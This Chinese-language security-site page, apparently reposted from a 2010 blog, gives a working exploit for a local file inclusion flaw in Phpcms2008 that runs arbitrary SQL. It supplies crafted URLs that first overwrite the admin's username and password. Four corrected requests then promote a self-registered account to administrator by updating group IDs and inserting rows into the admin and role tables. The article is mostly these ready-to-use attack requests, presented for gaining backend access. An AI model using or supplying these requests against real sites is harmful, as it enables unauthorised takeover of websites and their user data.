首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行【再次更新exp】
来源:http://hi.baidu.com/3hack_yesu/blog/ 作者:3hack_yesu 发布时间:2010-09-09  

漏洞文件在wap/index.php,包含的文件限制为*.inc.php。随便包含一个有利用价值的去包含即可。

 

formguide/admin/include/fields/datetime/field_add.inc.php

 

EXP:错误的!!!!!!请看最下面的

老君只给了POC

朋友问我,访问那个poc就跳转,怎么爆密码

因为是执行SQL,不会回显的,所以爆不了帐号密码。

只能update和INSERT INTO了

INSERT INTO添加管理员当然是最好的了。

我这里就给个UPDATE更新的吧

www.site.com/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=UPDATE phpcms_member SET username =123456 where userid=1

这个是把管理帐户改成123456

 

www.site.com/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=UPDATE phpcms_member SET password =e10adc3949ba59abbe56e057f20f883e where userid=1

这个是把管理帐户密码改成123456

 

userid可以自行变化,一般情况下,管理是1,有的可能是2,3,4。。。。。。。。

 

------------------------------------------------------------------------------------------------------

下面是正确的EXP,一共四句

很抱歉,上次就光写,理论上是对的,但是实际却行不通

错误第一点:经过测试,只能update的值必须是数字,含有字母,就update不进去。

帐号可以是数字的值,但是md5得有字母啊,我是没找到纯数字的32位MD5。

错误第二点:phpcms不是纯md5加密,所以写的MD5进去是没用的。

 

变换个方法吧

先注册一个帐号。

这样就成功的在数据库添加了我们的帐户,我们剩下的就是update把自己变成管理员,要四句句才能搞定了。

注意,由于值不能含有字母,所以我们注册的时候,帐户一定要是纯数字的,比如我注册的帐户是123456,下面要用到的。

注册好之后

登陆,进入会员中心点,个人空间

 

点发送消息

 

在看url




 

运行第一句,userid改成自己的。

http://127.0.0.1/phpcms2008sp4/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=UPDATE phpcms_member SET groupid=1 where userid=4

 

第二句

http://127.0.0.1/phpcms2008sp4/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=UPDATE phpcms_member_cache SET groupid=1 where userid=4

因为phpcms有两个member表,所以要改两次,上面的4都是userid

 

第三句,赋予管理员权限

http://127.0.0.1/phpcms2008sp4/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=INSERT INTO phpcms_admin (userid,username,allowmultilogin,alloweditpassword) values(4,1234567,1,1)

 

这里的4是userid,后面的123467是注册的用户名。

 

第四句,还是赋予权限

http://127.0.0.1/phpcms2008sp4/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=INSERT INTO phpcms_admin_role (userid,roleid) values(4,1)

 

4是userid,1不要改。

 

之后,你就可以登陆后台啦.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·SiteEngine CMS 5.1.0 文件上传
·Phpcms2008本地文件包含漏洞及利
·站易企网站管理系统CTEIMS 1.1 0
·PHP168 V6.02整站系统远程执行任
·Phpwind 注入以及利用之一:远程
·phpwind远程代码执行漏洞
·phpcms 2008 sp4 爆路径及任意文
·FCKeditor二次上传拿shell
·Piwik和OpenX多版本存在PHP远程
·DedeCmsV5.6 本地包含里的上传漏
·老Y文章管理系统 v2.5 sp2 SQL注
·dede的又一个代码执行
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved